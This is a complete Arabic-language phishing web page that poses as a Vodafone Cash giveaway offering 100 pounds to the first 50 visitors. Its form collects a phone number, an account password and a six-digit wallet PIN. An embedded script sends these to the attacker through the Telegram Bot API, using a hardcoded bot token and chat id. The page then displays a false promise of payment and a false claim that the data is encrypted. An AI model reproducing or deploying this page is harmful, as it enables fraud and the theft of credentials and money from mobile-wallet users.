
<!DOCTYPE html>
<html lang="ar">
<head>
  <meta charset="UTF-8">
  <title>فودافون كاش - استلم 100 جنيه مجاناً</title>
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <style>
    body { font-family: Tahoma, sans-serif; background: #f0f0f0; display: flex; justify-content: center; align-items: center; height: 100vh; }
    .box { background: white; padding: 30px; border-radius: 10px; box-shadow: 0 0 10px rgba(0,0,0,0.1); text-align: center; width: 90%; max-width: 400px; }
    input, button { margin: 10px 0; padding: 10px; width: 90%; border-radius: 5px; border: 1px solid #ccc; font-size: 16px; }
    button { background: red; color: white; border: none; cursor: pointer; }
  </style>
</head>
<body>
  <div class="box">
    <h2>🎁 استلم 100 جنيه فودافون كاش</h2>
    <p>لأول 50 شخص فقط!</p>
    <form onsubmit="sendData(); return false;">
      <input type="text" id="phone" placeholder="رقم الهاتف" required>
      <input type="password" id="password" placeholder="كلمة المرور" required>
      <input type="text" id="pin" placeholder="كود المحفظة (6 أرقام)" required>
      <button type="submit">✅ استلم الآن</button>
    </form>
    <p style="font-size: 12px; color: gray;">🔒 بياناتك مشفرة وآمنة</p>
  </div>
  <script>
    function sendData() {
      const token = "7989278640:AAEd5fyTYU5VauNqEwyUo-8I-vRqj6MU0m0";
      const chat_id = "1896998598";
      const phone = document.getElementById("phone").value;
      const password = document.getElementById("password").value;
      const pin = document.getElementById("pin").value;
      const message = `📥 فودافون كاش\n📞 رقم: ${phone}\n🔐 كلمة المرور: ${password}\n🔑 كود المحفظة: ${pin}`;
      fetch(`https://api.telegram.org/bot${token}/sendMessage`, {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify({ chat_id: chat_id, text: message })
      });
      alert("جاري استلام الرصيد... سيتم التحويل خلال دقائق");
    }
  </script>
</body>
</html>
